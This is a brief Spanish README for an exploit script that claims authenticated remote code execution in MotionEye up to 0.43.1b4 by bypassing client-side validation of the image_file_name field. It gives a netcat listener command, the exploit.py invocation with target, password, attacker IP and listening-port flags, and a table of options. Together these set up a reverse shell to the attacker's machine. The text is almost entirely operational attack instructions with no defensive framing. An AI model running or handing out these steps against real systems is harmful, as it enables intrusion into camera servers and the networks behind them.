
RCE autenticado en MotionEye <= 0.43.1b4 mediante la omisión de la validación del lado del cliente en el campo image_file_name.
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444
| Bandera | Descripción |
|---|---|
-t | Host/URL de destino (por defecto, puerto 8765) |
-u | Usuario (por defecto: admin) |
-p | Contraseña: el mismo valor que escribes en la GUI / que se encuentra en motion.conf |
-lh | Tu IP de atacante |
-lp | Puerto de escucha |
--camera-id | ID de cámara (se detecta automáticamente si se omite) |